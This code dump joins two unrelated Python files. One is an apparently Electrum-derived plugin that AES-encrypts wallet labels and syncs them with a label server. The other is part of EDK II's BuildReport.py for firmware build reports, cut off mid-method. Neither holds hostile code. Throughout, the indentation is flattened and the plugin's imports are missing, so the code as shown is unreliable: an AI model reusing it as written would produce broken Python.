from electrum_seci.plugins import BasePlugin, hook
from electrum_seci.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.bauerj.eu'
self.wallets = {}
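    # Labels are encrypted client-side before upload: encode()/decode() apply
    # AES with a per-wallet key and IV derived from the wallet fingerprint in
    # start_wallet(), then base64 for transport.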
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum_seci.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted)
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum_seci.bitcoin.aes_decrypt_with_iv(password,
iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if not wallet in self.wallets:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
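    # Sync model: push_thread uploads every local label in one batch keyed by
    # walletId/walletNonce; pull_thread fetches labels changed since the last
    # seen nonce (or everything when force=True) and only overwrites a local
    # label when it is missing or force is set.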
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.iteritems():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.print_error("could not retrieve labels")
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
password = hashlib.sha1(mpk).digest().encode('hex')[:32]
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).digest().encode('hex')
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Patterns to find total FV size and occupied size in the flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
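#
# Illustrative sketch (kept as a comment so it is never executed): the driver
# type string reported for a module is looked up from this table, falling back
# to free form for unknown module types, e.g.
#
#   DriverType = gDriverTypeMap.get(SUP_MODULE_DXE_DRIVER, '0x2 (FREE_FORM)')
#   # DriverType == '0x7 (DRIVER)'
#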
## The lookup table of supported opcodes in dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and appends a new line
# afterwards. It may optionally wrap the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.write(String + gEndOfLine)
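#
# Illustrative sketch (comment only, not executed): FileWrite appends the report
# end-of-line sequence and can wrap long lines at 120 columns, e.g.
#
#   FileWrite(ReportFile, gSectionStart)
#   FileWrite(ReportFile, "A very long PCD value or flag string ...", Wrapper=True)
#
# "ReportFile" above is a hypothetical open file object used for the report.
#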
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}'):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
            Len = len(ValueList) // SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
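#
# Illustrative sketch (comment only): a brace-enclosed value with at least 16
# comma-separated bytes is reformatted into rows of up to 16 hex bytes, e.g.
#
#   IsByteArray, Rows = ByteArrayForamt("{0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,"
#                                       "0x09,0x0A,0x0B,0x0C,0x0D,0x0E,0x0F,0x10}")
#   # IsByteArray is True and Rows holds the formatted line(s), the last ending with '}'.
#   # Shorter values return (False, []) and are printed on a single line by the callers.
#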
##
# Find all the header files that the module source directly includes.
#
# This function scans source code for #include statements. It is not fully
# accurate, but it is effective at finding the header files a module might
# include.
#
# @Source            The source file name
# @IncludePathList   The list of include paths used to locate the header files
# @IncludeFiles      The dictionary of include files found so far
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
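#
# Illustrative sketch (comment only): the caller owns the result dictionary and
# this function fills it, keyed by the normalized, lower-cased header path, e.g.
#
#   IncludeFiles = {}
#   FindIncludeFiles("MdeModulePkg/Core/Dxe/DxeMain/DxeMain.c",
#                    ["MdePkg/Include", "MdeModulePkg/Include"], IncludeFiles)
#   # IncludeFiles now maps normalized lower-case paths to the headers that were found.
#
# The source path and include directories above are hypothetical examples.
#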
## Split each line in the file
#
# This method splits the lines in a file so that the length of each line is
# less than MaxLength.
#
# @param Content     The content of the file
# @param MaxLength   The maximum length of a line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
return NewContent
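#
# Illustrative sketch (comment only): long lines are broken at the last space,
# '/' or '\' before MaxLength, or hard-wrapped at MaxLength when none is found, e.g.
#
#   Content = FileLinesSplit(open(SomeReportFile).read(), gLineMaxLength)
#   # Every line in Content is now at most gLineMaxLength characters long.
#
# "SomeReportFile" is a hypothetical path to an existing text file.
#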
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translates
# GUID values into readable GUID names.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
    # This constructor function collects GUID values so that readable
    # GUID names can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
    # This function parses the binary dependency expression file and translates it
    # into an instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
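    #
    # Illustrative sketch (comment only): the returned list holds one mnemonic per
    # opcode, with BEFORE/AFTER/PUSH followed by a GUID name when it can be resolved
    # from the collected GUID database, e.g.
    #
    #   Statements = DepexParserObj.ParseDepexFile(DepexFilePath)
    #   # Statements might look like ["PUSH gEfiPcdProtocolGuid", "END"]
    #
    # "DepexParserObj" and "DepexFilePath" are hypothetical names for an existing
    # DepexParser instance and a module's .depex output file.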
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
            LibDestructorList = Lib.DestructorList
            LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
            LibTime = ""
            for LibAutoGen in M.LibraryAutoGenList:
                if LibInfPath == LibAutoGen.MetaFile.Path:
                    LibTime = LibAutoGen.BuildTime
                    break
            self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDestructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
    # This function generates the report for the module's libraries.
    # If the module is an EDKII-style one, the additional library class, library
    # constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
    # This constructor function generates a DepexReport object for
    # a module. If the module source contains a DXS file (usually an EDK-
    # style module), it uses the dependency in the DXS file; otherwise,
    # it uses the dependency expression from its own INF [Depex] section
    # and then merges it with the ones from its dependent library INFs.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
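    #
    # Illustrative, abridged sketch (comment only) of the subsection this class
    # emits for an INF-sourced dependency expression; the GUID names are hypothetical:
    #
    #   Final Dependency Expression (DEPEX) Instructions
    #     PUSH gEfiPcdProtocolGuid
    #     END
    #   Dependency Expression (DEPEX) from INF
    #   gEfiPcdProtocolGuid
    #   From Module INF: gEfiPcdProtocolGuid
    #   From Library INF: (None)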
##
# Reports build flags information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
    # This function generates the report for the module build flags.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
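    #
    # Illustrative, abridged sketch (comment only) of the subsection this class
    # emits; the tool chain tag and flag values are hypothetical:
    #
    #   Build Flags
    #   Tool Chain Tag: GCC5
    #   CC_FLAGS = -Os -Wall ...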
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises the module summary, module PCD, library, dependency expression,
# and build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
            # If a module complies with PI 1.1, promote its module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
            # Collect the set of all PCDs used by the module, referenced directly or indirectly by its INF.
            # It also saves the module INF default values of these PCDs when they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
    # This function generates the report for an individual module
    # in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
                # rebase the EFI image since its base address may not be zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
                # wait for the program to exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
                    self.Hash = hashlib.sha1()
                    buf = open(Tempfile, 'rb').read()
                    self.Hash.update(buf)
                    self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
